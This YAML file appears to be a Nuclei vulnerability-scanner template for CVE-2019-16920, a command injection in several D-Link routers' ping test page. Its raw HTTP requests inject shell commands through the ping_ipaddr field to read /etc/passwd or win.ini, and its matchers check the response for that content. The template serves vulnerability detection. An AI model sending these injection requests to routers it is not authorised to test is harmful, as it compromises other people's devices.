61 lines
2.4 KiB
YAML
61 lines
2.4 KiB
YAML
id: CVE-2019-16920
|
|
|
|
info:
|
|
name: D-Link Routers - Remote Code Execution
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-16920
|
|
- https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
|
|
- https://fortiguard.com/zeroday/FG-VD-19-117
|
|
- https://www.seebug.org/vuldb/ssvid-98079
|
|
- https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2019-16920
|
|
cwe-id: CWE-78
|
|
tags: cve,cve2019,dlink,rce,router,unauth,kev
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /apply_sec.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{BaseURL}}
|
|
|
|
html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
|
|
- |
|
|
POST /apply_sec.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{BaseURL}}/login_pic.asp
|
|
Cookie: uid=1234123
|
|
|
|
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
|
|
- |
|
|
POST /apply_sec.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{BaseURL}}/login_pic.asp
|
|
Cookie: uid=1234123
|
|
|
|
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "\\[(font|extension|file)s\\]"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/16
|